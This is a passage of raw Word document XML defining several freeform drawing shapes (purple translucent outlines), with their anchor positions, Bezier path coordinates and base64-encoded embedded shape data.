87LzZjP99rIZmk7X/6PByEs8u&#10;Ckw72UZBN5WogIQ992FP93i866FYcLBYnf2k8VM7f+6G/vgb3qDeElV0VV0N2rgTmlBTcY27CW10&#10;4Ull3dze2m+8/oR2f+q+nGqanKR6Audfn3+rhlNGnzebCS8of+nnR6DV9fw2Ehr3MpaQXX/7OPW7&#10;Az2ctHro5OobeDlqFce/cqWnqWHbjnp5i/vhfwAAAP//AwBQSwMEFAAGAAgAAAAhAMt/XGXhAAAA&#10;CwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SFwQdXBLCiFOhSJVUHFABCSubrwk&#10;UeN1FLtp+HuWExx35ml2Jt/MrhcTjqHzpOFmkYBAqr3tqNHw8b69vgMRoiFrek+o4RsDbIrzs9xk&#10;1p/oDacqNoJDKGRGQxvjkEkZ6hadCQs/ILH35UdnIp9jI+1oThzueqmSJJXOdMQfWjNg2WJ9qI5O&#10;Q/m6qg4vdZJ+7qrtcDXcl9PzU6n15cX8+AAi4hz/YPitz9Wh4E57fyQbRK9BqfUto2ysFG9gYqlS&#10;VvasrJcKZJHL/xuKHwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCD1Q4NQwoAANMrAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDLf1xl4QAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAAJsMAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAqQ0AAAAA&#10;" path="m277945,12085c237675,22152,270305,15684,189325,12085l80564,8057c65794,9400,50955,10125,36254,12085,30766,12817,25093,13637,20141,16113,16744,17812,14770,21484,12084,24170l4028,48339,,60423c1343,84592,1733,108833,4028,132931,4431,137158,5871,141374,8056,145015,10010,148272,12856,151118,16113,153072,19754,155257,24169,155757,28197,157100,30883,159785,32997,163202,36254,165156,40216,167533,61657,172592,64451,173213,78592,176355,94550,179083,108761,181269,118145,182713,127467,185037,136958,185297,225555,187724,314199,187982,402819,189325,432359,190668,461868,193354,491439,193354,519669,193354,547900,191670,576032,189325,580263,188972,584318,187196,588116,185297,592446,183132,596173,179926,600201,177241,602886,173213,606350,169606,608257,165156,615996,147099,608478,152628,616313,136959,618478,132629,621684,128902,624370,124874,625713,118160,628398,111580,628398,104733,628398,96992,622891,81799,616313,76536,612998,73884,608257,73851,604229,72508,600201,69822,596474,66616,592144,64451,588346,62552,583701,62607,580060,60423,576803,58469,574689,55052,572003,52367,561878,21990,575536,59433,559919,28198,558020,24400,558076,19754,555891,16113,552066,9738,541235,3657,535750,0l447129,4029,306143,8057c291326,8701,261832,12085,277945,12085xe" fillcolor="#7030a0" strokecolor="#ca58cf" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="277945,12085;189325,12085;80564,8057;36254,12085;20141,16113;12084,24170;4028,48339;0,60423;4028,132931;8056,145015;16113,153072;28197,157100;36254,165156;64451,173213;108761,181269;136958,185297;402819,189325;491439,193354;576032,189325;588116,185297;600201,177241;608257,165156;616313,136959;624370,124874;628398,104733;616313,76536;604229,72508;592144,64451;580060,60423;572003,52367;559919,28198;555891,16113;535750,0;447129,4029;306143,8057;277945,12085"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2144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C2F1648" wp14:editId="01227714">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1134443</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2828283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="652567" cy="189514"/>
                <wp:effectExtent l="25400" t="0" r="33655" b="13970"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="-841" y="0"/>
                    <wp:lineTo x="-841" y="20295"/>
                    <wp:lineTo x="21873" y="20295"/>
                    <wp:lineTo x="21873" y="8698"/>
                    <wp:lineTo x="20191" y="0"/>
                    <wp:lineTo x="-841" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="15" name="Freeform 15"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="652567" cy="189514"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 12084 w 652567"/>
                            <a:gd name="connsiteY0" fmla="*/ 12273 h 189514"/>
                            <a:gd name="connsiteX1" fmla="*/ 8056 w 652567"/>
                            <a:gd name="connsiteY1" fmla="*/ 32414 h 189514"/>
                            <a:gd name="connsiteX2" fmla="*/ 4028 w 652567"/>
                            <a:gd name="connsiteY2" fmla="*/ 44499 h 189514"/>
                            <a:gd name="connsiteX3" fmla="*/ 0 w 652567"/>
                            <a:gd name="connsiteY3" fmla="*/ 100894 h 189514"/>
                            <a:gd name="connsiteX4" fmla="*/ 4028 w 652567"/>
                            <a:gd name="connsiteY4" fmla="*/ 133119 h 189514"/>
                            <a:gd name="connsiteX5" fmla="*/ 8056 w 652567"/>
                            <a:gd name="connsiteY5" fmla="*/ 149232 h 189514"/>
                            <a:gd name="connsiteX6" fmla="*/ 24169 w 652567"/>
                            <a:gd name="connsiteY6" fmla="*/ 165345 h 189514"/>
                            <a:gd name="connsiteX7" fmla="*/ 80564 w 652567"/>
                            <a:gd name="connsiteY7" fmla="*/ 177429 h 189514"/>
                            <a:gd name="connsiteX8" fmla="*/ 165156 w 652567"/>
                            <a:gd name="connsiteY8" fmla="*/ 185486 h 189514"/>
                            <a:gd name="connsiteX9" fmla="*/ 269889 w 652567"/>
                            <a:gd name="connsiteY9" fmla="*/ 189514 h 189514"/>
                            <a:gd name="connsiteX10" fmla="*/ 475327 w 652567"/>
                            <a:gd name="connsiteY10" fmla="*/ 185486 h 189514"/>
                            <a:gd name="connsiteX11" fmla="*/ 547834 w 652567"/>
                            <a:gd name="connsiteY11" fmla="*/ 181458 h 189514"/>
                            <a:gd name="connsiteX12" fmla="*/ 580060 w 652567"/>
                            <a:gd name="connsiteY12" fmla="*/ 173401 h 189514"/>
                            <a:gd name="connsiteX13" fmla="*/ 624370 w 652567"/>
                            <a:gd name="connsiteY13" fmla="*/ 165345 h 189514"/>
                            <a:gd name="connsiteX14" fmla="*/ 644511 w 652567"/>
                            <a:gd name="connsiteY14" fmla="*/ 153260 h 189514"/>
                            <a:gd name="connsiteX15" fmla="*/ 652567 w 652567"/>
                            <a:gd name="connsiteY15" fmla="*/ 129091 h 189514"/>
                            <a:gd name="connsiteX16" fmla="*/ 640483 w 652567"/>
                            <a:gd name="connsiteY16" fmla="*/ 84781 h 189514"/>
                            <a:gd name="connsiteX17" fmla="*/ 628398 w 652567"/>
                            <a:gd name="connsiteY17" fmla="*/ 76725 h 189514"/>
                            <a:gd name="connsiteX18" fmla="*/ 604229 w 652567"/>
                            <a:gd name="connsiteY18" fmla="*/ 68668 h 189514"/>
                            <a:gd name="connsiteX19" fmla="*/ 592144 w 652567"/>
                            <a:gd name="connsiteY19" fmla="*/ 64640 h 189514"/>
                            <a:gd name="connsiteX20" fmla="*/ 572003 w 652567"/>
                            <a:gd name="connsiteY20" fmla="*/ 48527 h 189514"/>
                            <a:gd name="connsiteX21" fmla="*/ 567975 w 652567"/>
                            <a:gd name="connsiteY21" fmla="*/ 36443 h 189514"/>
                            <a:gd name="connsiteX22" fmla="*/ 551862 w 652567"/>
                            <a:gd name="connsiteY22" fmla="*/ 20330 h 189514"/>
                            <a:gd name="connsiteX23" fmla="*/ 547834 w 652567"/>
                            <a:gd name="connsiteY23" fmla="*/ 8245 h 189514"/>
                            <a:gd name="connsiteX24" fmla="*/ 523665 w 652567"/>
                            <a:gd name="connsiteY24" fmla="*/ 4217 h 189514"/>
                            <a:gd name="connsiteX25" fmla="*/ 491440 w 652567"/>
                            <a:gd name="connsiteY25" fmla="*/ 8245 h 189514"/>
                            <a:gd name="connsiteX26" fmla="*/ 370594 w 652567"/>
                            <a:gd name="connsiteY26" fmla="*/ 12273 h 189514"/>
                            <a:gd name="connsiteX27" fmla="*/ 193353 w 652567"/>
                            <a:gd name="connsiteY27" fmla="*/ 8245 h 189514"/>
                            <a:gd name="connsiteX28" fmla="*/ 76536 w 652567"/>
                            <a:gd name="connsiteY28" fmla="*/ 12273 h 189514"/>
                            <a:gd name="connsiteX29" fmla="*/ 12084 w 652567"/>
                            <a:gd name="connsiteY29" fmla="*/ 12273 h 1895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652567" h="189514">
                              <a:moveTo>
                                <a:pt x="12084" y="12273"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="671" y="15630"/>
                                <a:pt x="9716" y="25772"/>
                                <a:pt x="8056" y="32414"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="7026" y="36533"/>
                                <a:pt x="4524" y="40282"/>
                                <a:pt x="4028" y="44499"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1826" y="63216"/>
                                <a:pt x="1343" y="82096"/>
                                <a:pt x="0" y="100894"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1343" y="111636"/>
                                <a:pt x="2248" y="122441"/>
                                <a:pt x="4028" y="133119"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="4938" y="138580"/>
                                <a:pt x="5122" y="144537"/>
                                <a:pt x="8056" y="149232"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="12082" y="155673"/>
                                <a:pt x="16963" y="162943"/>
                                <a:pt x="24169" y="165345"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="57523" y="176463"/>
                                <a:pt x="41295" y="172809"/>
                                <a:pt x="80564" y="177429"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="106175" y="180442"/>
                                <a:pt x="140223" y="184174"/>
                                <a:pt x="165156" y="185486"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="200045" y="187322"/>
                                <a:pt x="234978" y="188171"/>
                                <a:pt x="269889" y="189514"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="475327" y="185486"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="499523" y="184785"/>
                                <a:pt x="523787" y="184233"/>
                                <a:pt x="547834" y="181458"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="558834" y="180189"/>
                                <a:pt x="569318" y="176087"/>
                                <a:pt x="580060" y="173401"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="605379" y="167071"/>
                                <a:pt x="590701" y="170155"/>
                                <a:pt x="624370" y="165345"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="632640" y="162588"/>
                                <a:pt x="640087" y="162108"/>
                                <a:pt x="644511" y="153260"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="648309" y="145664"/>
                                <a:pt x="652567" y="129091"/>
                                <a:pt x="652567" y="129091"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="650185" y="110030"/>
                                <a:pt x="653540" y="97837"/>
                                <a:pt x="640483" y="84781"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="637060" y="81358"/>
                                <a:pt x="632822" y="78691"/>
                                <a:pt x="628398" y="76725"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="620638" y="73276"/>
                                <a:pt x="612285" y="71354"/>
                                <a:pt x="604229" y="68668"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="592144" y="64640"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="586655" y="60980"/>
                                <a:pt x="575830" y="54905"/>
                                <a:pt x="572003" y="48527"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="569818" y="44886"/>
                                <a:pt x="570443" y="39898"/>
                                <a:pt x="567975" y="36443"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="563560" y="30262"/>
                                <a:pt x="551862" y="20330"/>
                                <a:pt x="551862" y="20330"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="550519" y="16302"/>
                                <a:pt x="550487" y="11561"/>
                                <a:pt x="547834" y="8245"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="536568" y="-5838"/>
                                <a:pt x="536526" y="1879"/>
                                <a:pt x="523665" y="4217"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="513014" y="6153"/>
                                <a:pt x="502250" y="7676"/>
                                <a:pt x="491440" y="8245"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="451191" y="10363"/>
                                <a:pt x="410876" y="10930"/>
                                <a:pt x="370594" y="12273"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="311514" y="10930"/>
                                <a:pt x="252449" y="8245"/>
                                <a:pt x="193353" y="8245"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="154391" y="8245"/>
                                <a:pt x="115487" y="11323"/>
                                <a:pt x="76536" y="12273"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="60428" y="12666"/>
                                <a:pt x="23497" y="8916"/>
                                <a:pt x="12084" y="12273"/>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298288" id="Freeform 494" o:spid="_x0000_s1026" style="position:absolute;margin-left:89.35pt;margin-top:222.7pt;width:51.4pt;height:14.9pt;z-index:251782144;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" coordsize="652567,18951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&#10;APMAAACXDAAAAAA=&#10;" path="m12084,12273c671,15630,9716,25772,8056,32414,7026,36533,4524,40282,4028,44499,1826,63216,1343,82096,,100894,1343,111636,2248,122441,4028,133119,4938,138580,5122,144537,8056,149232,12082,155673,16963,162943,24169,165345,57523,176463,41295,172809,80564,177429,106175,180442,140223,184174,165156,185486,200045,187322,234978,188171,269889,189514l475327,185486c499523,184785,523787,184233,547834,181458,558834,180189,569318,176087,580060,173401,605379,167071,590701,170155,624370,165345,632640,162588,640087,162108,644511,153260,648309,145664,652567,129091,652567,129091,650185,110030,653540,97837,640483,84781,637060,81358,632822,78691,628398,76725,620638,73276,612285,71354,604229,68668l592144,64640c586655,60980,575830,54905,572003,48527,569818,44886,570443,39898,567975,36443,563560,30262,551862,20330,551862,20330,550519,16302,550487,11561,547834,8245,536568,-5838,536526,1879,523665,4217,513014,6153,502250,7676,491440,8245,451191,10363,410876,10930,370594,12273,311514,10930,252449,8245,193353,8245,154391,8245,115487,11323,76536,12273,60428,12666,23497,8916,12084,12273xe" fillcolor="#7030a0" strokecolor="#ca58cf" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="12084,12273;8056,32414;4028,44499;0,100894;4028,133119;8056,149232;24169,165345;80564,177429;165156,185486;269889,189514;475327,185486;547834,181458;580060,173401;624370,165345;644511,153260;652567,129091;640483,84781;628398,76725;604229,68668;592144,64640;572003,48527;567975,36443;551862,20330;547834,8245;523665,4217;491440,8245;370594,12273;193353,8245;76536,12273;12084,12273" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D5424">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251773952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08163C05" wp14:editId="7299266C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>955781</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2025640</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1802024" cy="157396"/>
                <wp:effectExtent l="0" t="0" r="27305" b="20955"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20988"/>
                    <wp:lineTo x="21623" y="20988"/>
                    <wp:lineTo x="21623" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="19" name="Freeform 19"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1802024" cy="157396"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 40680 w 1802024"/>
                            <a:gd name="connsiteY0" fmla="*/ 14990 h 157396"/>
                            <a:gd name="connsiteX1" fmla="*/ 527860 w 1802024"/>
                            <a:gd name="connsiteY1" fmla="*/ 14990 h 157396"/>
                            <a:gd name="connsiteX2" fmla="*/ 925099 w 1802024"/>
                            <a:gd name="connsiteY2" fmla="*/ 22485 h 157396"/>
                            <a:gd name="connsiteX3" fmla="*/ 1119972 w 1802024"/>
                            <a:gd name="connsiteY3" fmla="*/ 14990 h 157396"/>
                            <a:gd name="connsiteX4" fmla="*/ 1464745 w 1802024"/>
                            <a:gd name="connsiteY4" fmla="*/ 0 h 157396"/>
                            <a:gd name="connsiteX5" fmla="*/ 1607152 w 1802024"/>
                            <a:gd name="connsiteY5" fmla="*/ 7495 h 157396"/>
                            <a:gd name="connsiteX6" fmla="*/ 1787034 w 1802024"/>
                            <a:gd name="connsiteY6" fmla="*/ 14990 h 157396"/>
                            <a:gd name="connsiteX7" fmla="*/ 1802024 w 1802024"/>
                            <a:gd name="connsiteY7" fmla="*/ 59960 h 157396"/>
                            <a:gd name="connsiteX8" fmla="*/ 1794529 w 1802024"/>
                            <a:gd name="connsiteY8" fmla="*/ 82445 h 157396"/>
                            <a:gd name="connsiteX9" fmla="*/ 1787034 w 1802024"/>
                            <a:gd name="connsiteY9" fmla="*/ 127416 h 157396"/>
                            <a:gd name="connsiteX10" fmla="*/ 1742063 w 1802024"/>
                            <a:gd name="connsiteY10" fmla="*/ 142406 h 157396"/>
                            <a:gd name="connsiteX11" fmla="*/ 1389794 w 1802024"/>
                            <a:gd name="connsiteY11" fmla="*/ 149901 h 157396"/>
                            <a:gd name="connsiteX12" fmla="*/ 1232398 w 1802024"/>
                            <a:gd name="connsiteY12" fmla="*/ 157396 h 157396"/>
                            <a:gd name="connsiteX13" fmla="*/ 422929 w 1802024"/>
                            <a:gd name="connsiteY13" fmla="*/ 149901 h 157396"/>
                            <a:gd name="connsiteX14" fmla="*/ 48175 w 1802024"/>
                            <a:gd name="connsiteY14" fmla="*/ 134911 h 157396"/>
                            <a:gd name="connsiteX15" fmla="*/ 25690 w 1802024"/>
                            <a:gd name="connsiteY15" fmla="*/ 127416 h 157396"/>
                            <a:gd name="connsiteX16" fmla="*/ 25690 w 1802024"/>
                            <a:gd name="connsiteY16" fmla="*/ 37475 h 157396"/>
                            <a:gd name="connsiteX17" fmla="*/ 40680 w 1802024"/>
                            <a:gd name="connsiteY17" fmla="*/ 14990 h 1573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802024" h="157396">
                              <a:moveTo>
                                <a:pt x="40680" y="14990"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="124375" y="11242"/>
                                <a:pt x="26881" y="14990"/>
                                <a:pt x="527860" y="14990"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="660297" y="14990"/>
                                <a:pt x="792686" y="19987"/>
                                <a:pt x="925099" y="22485"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="1119972" y="14990"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1464745" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1607152" y="7495"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="1667100" y="10283"/>
                                <a:pt x="1729085" y="-612"/>
                                <a:pt x="1787034" y="14990"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1802292" y="19098"/>
                                <a:pt x="1802024" y="59960"/>
                                <a:pt x="1802024" y="59960"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1799526" y="67455"/>
                                <a:pt x="1796243" y="74733"/>
                                <a:pt x="1794529" y="82445"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1791232" y="97280"/>
                                <a:pt x="1797041" y="115979"/>
                                <a:pt x="1787034" y="127416"/>
